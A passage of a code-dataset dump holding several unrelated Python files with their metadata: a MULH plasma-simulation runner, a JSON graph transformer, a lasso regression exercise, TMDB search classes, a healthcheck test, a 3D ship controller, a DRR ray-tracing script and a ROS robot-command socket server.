Number Of Cells in PML, integer\n config[15] = 1e-10 # R_max: Reflection error for normally incident wave (as a fraction)\n config[16] = 3 # m_PML: PML grading order, integer\n \n #==============================================================================\n # ########## Static DC magnetic field (poloidal + toroidal). Gauss format, e.g. 2/10000. Minimum field allowed = 1G#########\n #==============================================================================\n config[17] = 0. # sBx: Toroidal magnetic field at plasma center (T)\n config[18] = 0. # sBxu: Upper toroidal magnetic field at plasma center (T) (for atype==4)\n config[19] = 0. # sBy: Poloidal magnetic field in waveguide (T)\n config[20] = 0. # sByu: Upper poloidal magnetic field in waveguide (T)\n config[21] = 0. # sBz: Radial magnetic field in waveguide (T)\n config[22] = 0. # sBzu: Upper radial magnetic field in waveguide (T)\n \n #==============================================================================\n # ########## Particles #########\n #==============================================================================\n config[23] = 100 # Np: Number of primary particles (has to be even, preferably multiples of 16)\n config[24] = 5 # vth: Initial energy of seed electrons (eV), integer\n config[25] = np.sqrt(2.) # vra: Ratio of vth_perpendicular to vth_parallel (sqrt(2) for isotropic)\n config[26] = 3 # px_i: Position of seed e 1=Side walls 2=4 planes parallel to side walls 3= Randomly scattered in centered region\n config[27] = 4 # fmax: vth*fMax is the largest velocity represented for the sample array fSample\n config[28] = 250 # nsamplev: # of sample fraction values for creating a Maxwellian velocity distribution function\n config[29] = 3 # launch: Launch method 1=each at a different phase [0,360] 2=range of phases every 5 or 10 degrees [0,360] 3=random\n \n #==============================================================================\n # ########## Particle-Wall interaction #########\n #==============================================================================\n config[30] = 1 # seec: SEE model, =1 Modified Vaughan, =2 Furman & Pivi, =3 Cheng w/ de Lara Re/Rr, =4 FEST3Dish?\n config[31] = 1 # ReRr: Contributions from elastically (Re) and rediffused (Rr) electrons. 
=1 de Lara, =2 CERN LHC report\n config[32] = 35 # E1: First crossover\n config[33] = 165 # Emax: Emax(delta=max,theta=0) in eV\n config[34] = 0.5 # delta_b: Yield below E_0\n config[35] = 2.3 # deltamax: Maximum secondary electron yield (at Emax) for normal incidence (theta=0)\n config[36] = 1 # p_n: p_n phenomelogical parameter in Furman & Pivi, ==2 in Cheng\n config[37] = 1 # kse: Energy Roughness factor, [0,2], 0=rough,2=smooth\n config[38] = 1 # ks: Angle Roughness factor, [0,2], 0=rough,2=smooth\n config[39] = 1 # Eom: Av energy of Maxwellian distribution of secondary electrons emitted (eV)\n config[40] = 4 # Ns: Number of secondary electrons simulated (in multiples of Np)\n config[41] = 7.5e-3 # a_lara: Material dependent coeff for elastic contribution in de Lara's paper\n config[42] = 29 # z_lara: Atomic number of coating material in Lara's fit\n config[43] = 'copper' # mat: Material\n \n #==============================================================================\n # ########## Save outputs ##########\n #==============================================================================\n config[44] = 0\t # psave: Save particle position and velocity every psave iteration, =0 for not saving\"\n #==============================================================================\n # -------------------------END OF USER INPUTS----------------------------------\n #==============================================================================\n \n \n #==============================================================================\n # Store datas in config.mulh\n #==============================================================================\n # Read-only files were datatype and name of variables are written\n types = np.loadtxt(self.MULH_PATH + 'types.mulh', dtype=bytes).astype(str) # Trick to avoid the\n names = np.loadtxt(self.MULH_PATH + 'names.mulh', dtype=bytes).astype(str) # 'b' in front of strings\n\n # Write \n outfile = open(config_path, 'w')\n for i in range(45):\n # Columns <100 : User inputs with 'types.mulh' format ; Columns >100 : Variables names\n outfile.write(str(types[i]%config[i]) + names[i] + '\\n')\n outfile.close()\n \n printc( '\\n' + '_____________________________________' \n + '\\n' + ' config.mulh created! '\n + '\\n' + '_____________________________________'\n + '\\n',color='message')\n\n\n\n\n def set_config_parameter(self, config_path, param, value):\n \"\"\"\n Changes the inital value of param by value\n \n Arguments:\n - param: the name of the parameter that you want to be changed. It must be in the list 'MULH_PATH/names.mulh'\n - value: the new desired value of param\n \n Returns:\n None\n \"\"\"\n config_path = self.config_path\n types = np.loadtxt(self.MULH_PATH + 'types.mulh', dtype=bytes).astype(str) # Trick to avoid the\n names = np.loadtxt(self.MULH_PATH + 'names.mulh', dtype=bytes).astype(str) # 'b' in front of strings\n with fileinput.FileInput(config_path, inplace=True, backup='.bak') as file:\n for line in file:\n if(param in line and param == str(line.split()[1])):\n print(str(types[file.filelineno()-1]%value + names[file.filelineno()-1])) # Replace the param with the desired value and the good format\n else:\n print(line, end='')\n \n \n def get_config_parameter(self, param):\n \"\"\"\n Check if 'param' exists or has not been deleted by error\n \n Arguments:\n - param: the parameter. 
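Matching compares 'param' with the second whitespace-separated token of each config line. 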
It must be in the list 'MULH_PATH/names.mulh'\n \n Returns:\n - value of param\n \"\"\"\n config_path = self.config_path\n \n value = []\n with fileinput.FileInput(config_path) as file:\n for line in file:\n if(param in line and param == str(line.split()[1])):\n value = (line.split()[0])\n print('Parameter: ' + param + ' = ' + value)\n return value\n \n \n def fortran_compile(self):\n \"\"\"\n Compile the code with the 'make' command.\n \n Arguments:\n None\n \n Returns:\n Compilation status message\n \"\"\"\n printc('Compiling...', color='message')\n cmd_compile = 'cd && cd ' + self.MULH_PATH + ' && make'\n try:\n sub.call(cmd_compile, shell=True)\n printc( '\\n' + '_____________________________________' \n + '\\n' + ' Compilation complete! '\n + '\\n' + '_____________________________________'\n + '\\n',color='message')\n\n except sub.CalledProcessError as e:\n printc( '\\n' + '_____________________________________' \n + '\\n' + ' Compilation failed! '\n + '\\n' + ' Error ' + e\n + '\\n' + '_____________________________________'\n + '\\n',color='error')\n printc('Complete !', color='message')\n \n \n def run(self):\n \"\"\"\n Run the MULH modeling.\n \n Arguments:\n None\n \n Returns:\n None\n \"\"\"\n\n try:\n env = os.environ\n with sub.Popen(self._get_run_command(), shell=True, env=env, \n stdout=sub.PIPE, stderr=sub.PIPE, universal_newlines=True) as p:\n for lines in p.stdout:\n print(lines, end=' ') # Print MULH messages\n except OSError as e:\n printc('Error ! ' + e, color='error')\n\n \n def _get_run_command(self):\n \"\"\"\n Define bash command that will run the MULH code\n \n Arguments:\n None\n \n Returns:\n command line\n \"\"\"\n cmd = 'cd && cd ' + self.BIN_PATH + ' && ./MULH ' + self.config_path + ' ' + self.output_path\n return(cmd)\n \n \n \n def get_results(self):\n \"\"\"\n Returns MULH run results\n \n Arguments:\n None\n \n Returns:\n power: array of breakdown power\n sBx, sBy, sBz: toroidal, poloidal and radial static magnetic fields\n \"\"\"\n power, sBx, sBy, sBz = None, None, None, None\n if os.path.isfile(self.output_path):\n power, sBx, sBy, sBz = np.loadtxt(self.output_path, \n skiprows=0, \n unpack=True)\n self.power = power\n self.sBx = sBx\n self.sBy = sBy\n self.sBz = sBz\n return power, sBx, sBy, sBz\n\n \n \nif __name__ == \"__main__\": \n # Absolute path of the project\n project_path = '/Home/AP252436/Work_MULH/'\n \n # Output path\n results_file = 'results/results.txt'\n output_path = os.path.join(project_path, results_file)\n \n # Path to the .mulh file \n config_file = 'config.mulh'\n config_path = os.path.join(project_path, config_file)\n printc('RESULTS PATH : ' + output_path)\n # Run the MULH Simulation \n mulh = MULHcl(project_path, config_path, output_path)\n\n # Create the config file\n mulh.create_config_file(config_path)\n \n \n # Give the parameter name\n parameter_name = 'sBx'\n\n # Compile only if it is the first execution of the program\n if(mulh.counter == 0):\n mulh.fortran_compile()\n mulh.counter = mulh.counter + 1\n printc(\"Compteur d'exécutions : \" + str(mulh.counter),color='message') # Debug\n try:\n mulh.run()\n power, sBx, sBy, sBz = mulh.get_results()\n except ValueError:\n mulh.error_counter = mulh.error_counter + 1 \n printc(\"ERREUR !! 
Compteur d'erreurs : \" + str(mulh.error_counter),color='warning')\n mulh.run()\n power, sBx, sBy, sBz = mulh.get_results()\n\n \n printc('Breakdown power : ' + str(power) + 'W'\n + '\\n' + 'Toroidal magnetic field : ' + str(sBx) + 'T'\n + '\\n' + 'Poloidal magnetic field : ' + str(sBy) + 'T'\n + '\\n' + 'Radial magnetic field : ' + str(sBz) + 'T', color='results')\n \n # Appending the results to a text file\n with open(os.path.join(project_path, 'RESULTS.txt'),'ba') as f_handle:\n np.savetxt(f_handle, [power, sBx])\n \n \n \n \n \n \n \n \n","sub_path":"MULHBatch/MULH.py","file_name":"MULH.py","file_ext":"py","file_size_in_byte":17674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"486514944","text":"import json\nimport logging\nfrom .transformer import Transformer\nfrom .pandas_transformer import PandasTransformer # Temp\n\nclass JsonTransformer(PandasTransformer):\n \"\"\"\n \"\"\"\n\n def parse(self, filename, input_format='json', **args):\n \"\"\"\n Parse a JSON file\n \"\"\"\n with open(filename, 'r') as f:\n obj = json.load(f)\n self.load(obj)\n\n def load(self, obj):\n if 'nodes' in obj:\n self.load_nodes(obj['nodes'])\n if 'edges' in obj:\n self.load_edges(obj['edges'])\n\n def load_nodes(self, objs):\n for obj in objs:\n self.load_node(obj)\n def load_edges(self, objs):\n for obj in objs:\n self.load_edge(obj)\n\n def export(self):\n nodes=[]\n edges=[]\n for id,data in self.graph.nodes(data=True):\n node = data.copy()\n node['id'] = id\n nodes.append(node)\n for s, o, data in self.graph.edges(data=True):\n edge = data.copy()\n edge['subject'] = s\n edge['object'] = o\n edges.append(edge)\n\n return {\n 'nodes':nodes,\n 'edges':edges,\n }\n\n def save(self, filename, **args):\n \"\"\"\n Write a JSON file\n \"\"\"\n obj = self.export()\n with open(filename,'w') as file:\n file.write(json.dumps(obj, indent=4, sort_keys=True))\n","sub_path":"kgx/json_transformer.py","file_name":"json_transformer.py","file_ext":"py","file_size_in_byte":1421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"401773041","text":"import import_files\n\nimport numpy as np\nimport pandas as pd\nimport math\nimport matplotlib.pyplot as plt\n\nfrom regressionalgorithms import * \nimport dataloader\nfrom dataloader import load_ctscan\nfrom time import sleep\n\ndef l2err(prediction,ytest):\n \"\"\" l2 error (i.e., root-mean-squared-error) \"\"\"\n return np.linalg.norm(np.subtract(prediction,ytest))\n\n\ndef l2(vec):\n \"\"\" l2 norm on a vector \"\"\"\n return np.linalg.norm(vec)\n\n\ndef loadcsv(filename):\n dataset = np.genfromtxt(filename, delimiter=',')\n return dataset\n\ndef load_ctscan(trainsize=5000, testsize=5000):\n \"\"\" A CT scan dataset \"\"\"\n if trainsize + testsize < 5000:\n filename = '../code/datasets/slice_localization_data.csv'\n else:\n filename = '../code/datasets/slice_localization_data.csv'\n dataset = loadcsv(filename)\n trainset, testset = splitdataset(dataset,trainsize, testsize,featureoffset=1) \n return trainset,testset\n\ndef rmse(vec):\n return np.sqrt(sum(vec)/vec.shape[0])\n\n# Changed the normalizing.\ndef splitdataset(dataset, trainsize, testsize, testdataset=None, featureoffset=None, outputfirst=None):\n \"\"\"\n Splits the dataset into a train and test split\n If there is a separate testfile, it can be specified in testfile\n If a subset of features is desired, this can be specifed with featureinds; defaults to all\n Assumes output variable is the last 
variable\n \"\"\"\n randindices = np.random.randint(0,dataset.shape[0],trainsize+testsize)\n featureend = dataset.shape[1]-1\n outputlocation = featureend \n if featureoffset is None:\n featureoffset = 0\n if outputfirst is not None:\n featureoffset = featureoffset + 1\n featureend = featureend + 1\n outputlocation = 0\n \n Xtrain = dataset[randindices[0:trainsize],featureoffset:featureend]\n ytrain = dataset[randindices[0:trainsize],outputlocation]\n Xtest = dataset[randindices[trainsize:trainsize+testsize],featureoffset:featureend]\n ytest = dataset[randindices[trainsize:trainsize+testsize],outputlocation]\n\n if testdataset is not None:\n Xtest = dataset[:,featureoffset:featureend]\n ytest = dataset[:,outputlocation] \n\n # Normalize features, with maximum value in training set\n # as realistically, this would be the only possibility \n for ii in range(Xtrain.shape[1]):\n Xtrain[:,ii] = np.divide(Xtrain[:,ii], np.sqrt(np.sum(Xtrain[:,ii]**2)))\n Xtest[:,ii] = np.divide(Xtest[:,ii], np.sqrt(np.sum(Xtrain[:,ii]**2)))\n \n # Add a column of ones; done after to avoid modifying entire dataset\n Xtrain = np.hstack((Xtrain, np.ones((Xtrain.shape[0],1))))\n Xtest = np.hstack((Xtest, np.ones((Xtest.shape[0],1))))\n \n return ((Xtrain,ytrain), (Xtest,ytest))\n\n\n#Load the data\ntrain,test = load_ctscan(20000,10000)\nX_train,y_train = train\nX_test, y_test = test\n\n'''\nThis class applies lasso regularization to linear regression.\n\nInput: lambda_param : The regularization meta parameter.\n step_size : The tolerance for changes in the residuals.\n max_iter : The maximum number of iteration to run the coordinate descent\n if it doesn't converge.\nOutput: (void) Set weights for linear regression.\n'''\nclass Lasso():\n def __init__(self, lambda_param= 0.05,step_size=0.00001, max_iter = 20):\n self.lambda_param = lambda_param\n self.reg = FSLinearRegression({'features':list(range(385))})\n self.reg.weights = None\n self.step_size = step_size\n self.max_iter = max_iter\n\n ## Coordinate descent to solve the lasso problem, takes in the features\n ## of the training set and the target variable.\n def coordinate_descent(self,Xv_train,yv_train):\n # self.reg.weights : sets the weight of the linear regression. 
see the __init__ for\n # constructor of FSLinearRegression.\n self.reg.weights = np.random.random(Xv_train.shape[1])\n \n converged = False\n residual = yv_train\n ## The loop runs till the convergence condition is met or the number\n ## of iterations are reached.\n while (~(converged)&(self.max_iter > 0)) :\n step_sizes = []\n for idx in sorted(list(range(Xv_train.shape[1]))): # run for all the features in the training set.\n \n # find the predicted value by removing one features/coordinate at a time.\n yv_pred = np.dot(np.delete(Xv_train,idx,axis = 1), np.delete(self.reg.weights,idx,axis = 0)) \n prev_residual = residual\n residual = yv_train - yv_pred # calculate the residual.\n normalizer = np.sqrt(np.sum(residual**2) * np.sum(Xv_train[:,idx]**2) )\n rho = np.dot(residual,Xv_train[:,idx]) / normalizer # calculate the correlation with the index choosen.\n \n # Apply soft thresholding condition for each features, each control statement holds one condition.\n if rho < (-self.lambda_param/2): \n self.reg.weights[idx] = rho + self.lambda_param/2\n elif ((rho >= -self.lambda_param/2) and (rho <= self.lambda_param/2)):\n self.reg.weights[idx] = 0\n elif rho > (self.lambda_param/2):\n self.reg.weights[idx] = rho - self.lambda_param/2\n step_sizes.append(np.abs(rmse(residual) - rmse(prev_residual)))\n converged = max(step_sizes) < self.step_size # Check if converged.\n self.max_iter = self.max_iter - 1 # decrease the max_iteration.\n print(\"Lambda=\",self.lambda_param)\n print(\"Number of zero weights=\",sum(np.abs(self.reg.weights) == 0))\n\nlasso = Lasso()\nlasso.coordinate_descent(X_train,y_train)\ny_pred = lasso.reg.predict(X_test)\nprint(\"Test error=\",l2err(y_pred,y_test)/y_test.shape[0])\n\n","sub_path":"Machine Learning Algorithms/Assignment 2/Solutions/solve_Q2f.py","file_name":"solve_Q2f.py","file_ext":"py","file_size_in_byte":5862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"326573155","text":"from __future__ import annotations\n\nfrom dataclasses import dataclass, field\nfrom typing import Optional, List\n\nimport aiohttp\n\nfrom .base import BaseSearch, MediaNotFound, multi_search\n\n\n@dataclass\nclass PersonSearch:\n id: int\n adult: bool\n name: str\n gender: int\n media_type: str\n popularity: float\n known_for_department: str\n profile_path: Optional[str] = None\n known_for: List[dict] = field(default_factory=list)\n\n @property\n def notable_roles(self) -> str:\n if not self.known_for:\n return \"\"\n first = self.known_for[0].get('title') or self.known_for[0].get('name')\n if len(self.known_for) > 1:\n first += f\" & {len(self.known_for) - 1} more!\"\n return f\"(known for {first})\"\n\n @classmethod\n async def request(\n cls,\n session: aiohttp.ClientSession,\n api_key: str,\n query: str\n ) -> MediaNotFound | List[PersonSearch]:\n all_data = await multi_search(session, api_key, query)\n if isinstance(all_data, MediaNotFound):\n return all_data\n filtered_data = [media for media in all_data if media.get(\"media_type\") == \"person\"]\n if not filtered_data:\n return MediaNotFound(\"❌ No results.\", 404)\n\n # filtered_data.sort(key=lambda x: x.get('name'))\n return [cls(**person) for person in filtered_data]\n\n\n@dataclass\nclass MovieSearch(BaseSearch):\n title: str = ''\n original_title: str = ''\n release_date: str = ''\n original_language: str = ''\n video: Optional[bool] = None\n adult: Optional[bool] = None\n\n @classmethod\n async def request(\n cls,\n session: aiohttp.ClientSession,\n api_key: str,\n 
query: str\n ) -> MediaNotFound | List[MovieSearch]:\n all_data = await multi_search(session, api_key, query)\n if isinstance(all_data, MediaNotFound):\n return all_data\n filtered_data = [media for media in all_data if media.get(\"media_type\") == \"movie\"]\n if not filtered_data:\n return MediaNotFound(\"❌ No results.\", 404)\n\n filtered_data.sort(key=lambda x: x.get('release_date'), reverse=True)\n return [cls(**movie) for movie in filtered_data]\n\n\n@dataclass\nclass TVShowSearch(BaseSearch):\n name: str = ''\n original_name: str = ''\n first_air_date: str = ''\n original_language: str = ''\n origin_country: List[str] = field(default_factory=list)\n\n @classmethod\n async def request(\n cls,\n session: aiohttp.ClientSession,\n api_key: str,\n query: str\n ) -> MediaNotFound | List[TVShowSearch]:\n all_data = await multi_search(session, api_key, query)\n if isinstance(all_data, MediaNotFound):\n return all_data\n filtered_data = [media for media in all_data if media.get(\"media_type\") == \"tv\"]\n if not filtered_data:\n return MediaNotFound(\"❌ No results.\", 404)\n\n filtered_data.sort(key=lambda x: x.get('first_air_date'), reverse=True)\n return [cls(**tvshow) for tvshow in filtered_data]\n","sub_path":"moviedb/api/search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":3077,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"494861129","text":"import synapse.lib.health as s_healthcheck\n\nimport synapse.tests.utils as s_t_utils\n\n\nclass HealthcheckTest(s_t_utils.SynTest):\n\n async def test_healthcheck(self):\n\n # .healthy property setter behavior\n hcheck = s_healthcheck.HealthCheck('test')\n with self.raises(AttributeError):\n hcheck.setStatus(True)\n with self.raises(ValueError):\n hcheck.setStatus('okay')\n\n # Ensure that we can only degrade status\n self.eq(hcheck.getStatus(), 'nominal')\n hcheck.setStatus('nominal')\n self.eq(hcheck.getStatus(), 'nominal')\n hcheck.setStatus('degraded')\n self.eq(hcheck.getStatus(), 'degraded')\n hcheck.setStatus('failed')\n self.eq(hcheck.getStatus(), 'failed')\n hcheck.setStatus('degraded')\n self.eq(hcheck.getStatus(), 'failed')\n hcheck.setStatus('nominal')\n self.eq(hcheck.getStatus(), 'failed')\n\n # Show a passing / failing healthcheck on a cell\n async with self.getTestCoreAndProxy() as (core, prox):\n snfo1 = await prox.getHealthCheck()\n self.eq(snfo1.get('status'), 'nominal')\n self.eq(snfo1.get('iden'), core.getCellIden())\n comps = snfo1.get('components')\n testdata = [comp for comp in comps if comp.get('name') == 'testmodule'][0]\n self.eq(testdata,\n {'status': 'nominal',\n 'name': 'testmodule',\n 'mesg': 'Test module is healthy',\n 'data': {'beep': 0}})\n\n # The TestModule registers a syn:health event handler on the Cortex\n mod = core.modules.get('synapse.tests.utils.TestModule') # type: s_t_utils.TestModule\n # Now force the module into a degraded state.\n mod.healthy = False\n\n snfo2 = await prox.getHealthCheck()\n self.eq(snfo2.get('status'), 'failed')\n comps = snfo2.get('components')\n testdata = [comp for comp in comps if comp.get('name') == 'testmodule'][0]\n self.eq(testdata,\n {'status': 'failed',\n 'name': 'testmodule',\n 'mesg': 'Test module is unhealthy',\n 'data': {'beep': 1}})\n","sub_path":"synapse/tests/test_lib_health.py","file_name":"test_lib_health.py","file_ext":"py","file_size_in_byte":2265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"261327020","text":"#!/usr/bin/env 
python3\n\nimport numpy as np\nimport glfw\n\nfrom core.node import Node\nfrom core.transform import vec, sincos, scale, rotate, translate\nfrom model.model import Model, load_model\n\n\nSHIP_NAME = '../assets/models/ship_light.obj'\nSHIP_MAX_SIZE = 8\nSHIP_DEFAULT_ANGLE = -45\nSHIP_SPEED = 4\nSHIP_ANGULAR_VELOCITY = 75\nHEIGHT_DEFAULT = -0.25\nHEIGHT_WATER_SCALING = 0.25\nHEIGHT_DIRECTION_BIAIS = -0.25\nROLL_SCALING = 0.5\n\n\nclass Player(Node):\n def __init__(self, lights_manager, water):\n super().__init__()\n\n self.water = water\n\n ship = load_model(SHIP_NAME, lights_manager)\n self.add(*ship)\n\n lowers, uppers = zip(*[child.bounds for child in ship])\n self.bounds = (np.min(lowers, axis=0), np.max(uppers, axis=0))\n self.scaling = SHIP_MAX_SIZE / np.max(self.bounds[1] - self.bounds[0])\n self.bounds = (self.bounds[0] * self.scaling, self.bounds[1] * self.scaling)\n self.diagonal = self.bounds[1] - self.bounds[0]\n self.local_center = sum(self.bounds) / 2\n\n self.position = vec(0, 0, 0)\n self.roll_time = 0\n self.speed = 0\n self.angle = SHIP_DEFAULT_ANGLE\n self.angular_velocity = [0, 0]\n\n def update(self, delta_time):\n self.angle += delta_time * sum(self.angular_velocity)\n rotation = translate(self.local_center) @ rotate((0, 1, 0), self.angle - 90) @ translate(-self.local_center)\n\n sin_angle, cos_angle = sincos(self.angle)\n direction = vec(cos_angle, 0, -sin_angle)\n\n self.position += delta_time * self.speed * direction\n\n x, _, z = self.position - (self.diagonal[2] / 2 + HEIGHT_DIRECTION_BIAIS) * direction\n height = HEIGHT_DEFAULT + HEIGHT_WATER_SCALING * self.water.height(x, z)\n\n translation = translate(self.position + vec(0, height, 0))\n\n rolling = rotate((0, 0, 1), ROLL_SCALING * periodic(self.roll_time))\n self.roll_time += delta_time\n\n self.set_transform(translation @ rotation @ rolling @ scale(self.scaling))\n\n super().update(delta_time)\n\n def key_handler(self, key, is_press):\n if key == glfw.KEY_UP:\n self.speed = SHIP_SPEED if is_press else 0\n elif key == glfw.KEY_LEFT:\n self.angular_velocity[0] = SHIP_ANGULAR_VELOCITY if is_press else 0\n elif key == glfw.KEY_RIGHT:\n self.angular_velocity[1] = -SHIP_ANGULAR_VELOCITY if is_press else 0\n\n super().key_handler(key, is_press)\n\n\ndef smoothstep(x):\n return x * x * (3 - 2 * x)\n\n\ndef periodic(x):\n x = x % 2\n y = smoothstep(x) if x < 1 else smoothstep(2 - x)\n return 2 * y - 1\n","sub_path":"src/player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":2619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"376734213","text":"import math\n\nf = open(\"L1.sta\", \"r\")\ninfo = f.read().split('\\n')\nNx = eval(info[0].split(' ')[1])\nNy = eval(info[0].split(' ')[2])\nNz = eval(info[0].split(' ')[3])\n\ndX = eval(info[1].split(' ')[1])\ndY = eval(info[1].split(' ')[2])\ndZ = eval(info[1].split(' ')[3])\n\nDataType = info[2].split(' ')[1]\n\nimport numpy as np\n\nDim_size = np.array((Nx,Ny,Nz),dtype=np.int) #Or read that from your mhd info File\n\nfilename = 'L1.raw'\n\nf = open(filename,'r') #only opens the file for reading\nCT_img = np.fromfile(f,dtype=np.uint8)\nCT_img = CT_img.reshape(Dim_size[0],Dim_size[1],Dim_size[2])\n\n\n\nX1, Y1, Z1 = 1000,1000,0 # Projector Source position\n\nX0, Y0, Z0 = 1000,1000,1000\n\ndetector_distance = Z0 + Nx//2 # distance from source\n\nZ2 = detector_distance\n\nm = ((Y0 - Ny//2) - Y1)/((Z0 - Nz//2) - Z1)\nc = Y0 - m*Z0\nY2_min = int(m*Z2 + c)\n\nm = ((X0 - Nx//2) - X1)/((Z0 - Nz//2) - Z1)\nc = 
X0 - m*Z0\nX2_min = int(m*Z2 + c)\n\nm = ((Y0 + Ny//2) - Y1)/((Z0 - Nz//2) - Z1)\nc = Y0 - m*Z0\nY2_max = int(m*Z2 + c)\n\nm = ((X0 + Nx//2) - X1)/((Z0 - Nz//2) - Z1)\nc = X0 - m*Z0\nX2_max = int(m*Z2 + c)\n\nalpha = []\nalpha_X = []\nalpha_Y = []\nalpha_Z = []\n\nx0 = 0\nx1 = 0\nfor X2 in range(X2_min,X2_max):\n # calculate alphas for X\n\n if X2 < X1:\n for i in range(-Nx//2+x0,0):\n alphaX = (X0 + i - X1)/(X2-X1)\n alpha.append(alphaX)\n alpha_X.append(alphaX)\n x0+=1\n if X2 > X1:\n for i in range(0+x1,Nx//2):\n if X0+i < X2:\n alphaX = (X0 + i - X1)/(X2-X1)\n alpha.append(alphaX)\n alpha_X.append(alphaX)\n x1+=1\n\ny0 = 0\ny1 = 0\nfor Y2 in range(Y2_min,Y2_max):\n # calculate alphas for Y\n if Y2 < Y1:\n for j in range(-Ny//2+y0,0):\n alphaY = (Y0 + j - Y1)/(Y2-Y1)\n alpha.append(alphaY)\n alpha_Y.append(alphaY)\n y0+=1\n if Y2 > Y1:\n for j in range(0+y1,Ny//2):\n if Y0 + j < Y2:\n alphaY = (Y0 + j - Y1)/(Y2-Y1)\n alpha.append(alphaY)\n alpha_Y.append(alphaY)\n y1+=1\n\n# calculate alphas for Z\nfor k in range(-Nz//2,Nz//2):\n alphaZ = (Z0 + k - Z1)/(Z2-Z1)\n alpha.append(alphaZ)\n alpha_Z.append(alphaZ)\n\n# sort alphas\nalpha.sort()\nalpha_X.sort()\nalpha_Y.sort()\nalpha_Z.sort()\n\nN = len(alpha)\nNX = len(alpha_X)\nNY = len(alpha_Y)\nNZ = len(alpha_Z)\n\np_l_sum = 0\n\nalphamin = alpha[0]\nalphamax = alpha[len(alpha)-1]\n\nkmax = math.trunc(Z1+alphamax*(Z2-Z1)-Z0)\nimax = math.trunc(X1+alphamax*(X2_max-X1)-X0)\njmax = math.trunc(Y1+alphamax*(Y2_max-Y1)-Y0)\n\nimport time\n\nt = time.time()\nfor m in range(N-1):\n # calculate alpha mid\n alpha_mid = (alpha[m+1]+alpha[m])/2\n l = alpha[m+1]-alpha[m]\n\n k = math.trunc(Z1+alpha_mid*(Z2-Z1)-Z0)\n\n if k>0:\n k = int(k*(Nz//2)/(kmax))\n else:\n k = int(k*(-1+Nz//2)/(-1+kmax))\n\n for X2 in range(X2_min,X2_max):\n i = math.trunc(X1+alpha_mid*(X2-X1)-X0)\n\n if i>0:\n i = int(i*(Nx//2)/(imax))\n else:\n i = int(i*(-1+Nx//2)/(1+imax))\n\n for Y2 in range(Y2_min,Y2_max):\n j = math.trunc(Y1+alpha_mid*(Y2-Y1)-Y0)\n\n if j>0:\n j = int(j*(Ny//2)/(jmax))\n else:\n j = int(j*(-1+Ny//2)/(1+jmax))\n\n p = CT_img[Nx//2 + i][Ny//2 + j][Nz//2+k]\n p_l_sum += p*l\n\nelapsed = time.time() - t\nprint(elapsed)\n\n# define DRR image\nDRR = np.empty(shape=(X2_max-X2_min,Y2_max-Y2_min),dtype=np.int)\nprint(DRR)\ni, j = 0, 0\nfor X2 in range(X2_min,X2_max):\n j = 0\n for Y2 in range(Y2_min,Y2_max):\n #calculate distance\n distance = math.sqrt((Z2-Z1)**2 + ((X2-X1))**2 + (Y2-Y1)**2)\n # calculate RPL\n DRR[i][j] = distance*p_l_sum\n j+=1\n i+=1\n\nfrom scipy.misc import imsave\n# x is the array you want to save\nimsave(\"image.png\", DRR)\n","sub_path":"siddon.py","file_name":"siddon.py","file_ext":"py","file_size_in_byte":3585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"165351661","text":"import sys\nsys.path.append(\"/home/pi/ros_catkin_ws/src/command2ros/src\")\nimport rospy\nimport roslib\nimport time\nimport socket\nimport threading\n\nfrom CommandRobot import CommandRobot\nfrom MovementData import MovementData\nfrom DataTransferProtocol import receiveData, sendData\nfrom command2ros.msg import MovementCommand\n\nroslib.load_manifest('command2ros')\n\nsendRate = 10 #Hz #**sendRate = rospy.Rate(10) #Hz\n\n\"\"\"\nDataDistributor Create threads to control network connections\n from clients\n\"\"\"\nclass DataDistributor(threading.Thread):\n\n def __init__(self):\n self.data = MovementData()\n threading.Thread.__init__(self)\n return\n\n #set up socket to receive incoming requests\n def 
run(self):\n server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n server.bind((\"192.168.1.45\", 10000)) #George, localhost to make faster?\n server.listen(1) #backlog is 1\n\n #accept connections and spawn thread to handle\n #until server closes\n while True:\n (clientSocket, address) = server.accept()\n cs = DataServer(clientSocket, self, address)\n cs.run()\n return\n\n\"\"\"\nDataServer Manage connection to a given client, receives and\n sends commands\n\"\"\"\nclass DataServer(threading.Thread):\n\n def __init__(self, socket, distributor, address):\n self.socket = socket\n self.distributor = distributor #George\n self.address = address \n\n threading.Thread.__init__(self)\n return\n\n def run(self):\n try:\n sendTime = 0\n\n while True: #**not rospy.is_shutdown():\n self.socket.setblocking(1)\n\n #send last movement data to the client if time has passed\n if sendTime < time.time(): #**delete\n sendData(self.socket, self.distributor.data)\n sendTime = time.time() + 1/float(sendRate) #**sendRate.sleep()\n\n try:\n self.socket.setblocking(0)\n\n #get new command\n newCommand = receiveData(self.socket)\n\n #add command to execution queue\n if newCommand.eStop:\n commandQueue.insert(0, newCommand)\n else:\n commandQueue.append(newCommand)\n except socket.error:\n continue\n except socket.error: \n #lost connection, stop robot\n newCommand = MovementData()\n newCommand.eStop = True\n commandQueue.insert(0, newCommand)\n return\n return\n\n#queue for sending movement commands to motors\ncommandQueue = []\n\n#handles connections between clients\ndataDist = DataDistributor()\ndataDist.start()\n\n#create ros publisher to update/send data\npub = rospy.Publisher('MovementCommand', queue_size=10)\nrospy.init_node('command2ros', anonymous=True)\n\n#start receiving movement commands\ncr = CommandRobot()\ncr.createConnection()\n\n#publish commands to arduino\nwhile True:\n if len(commandQueue) > 0:\n command = commandQueue.pop(0)\n\n #update to the next command\n mc = MovementCommand()\n mc.driveDist = command.driveDist #distance to drive meters \n mc.turn = command.turn #degrees for articulation motors\n mc.packin = command.packin #ending sequence, wheels tucked under\n mc.eStop = command.eStop #stop robot TODO:eStop and stop?\n 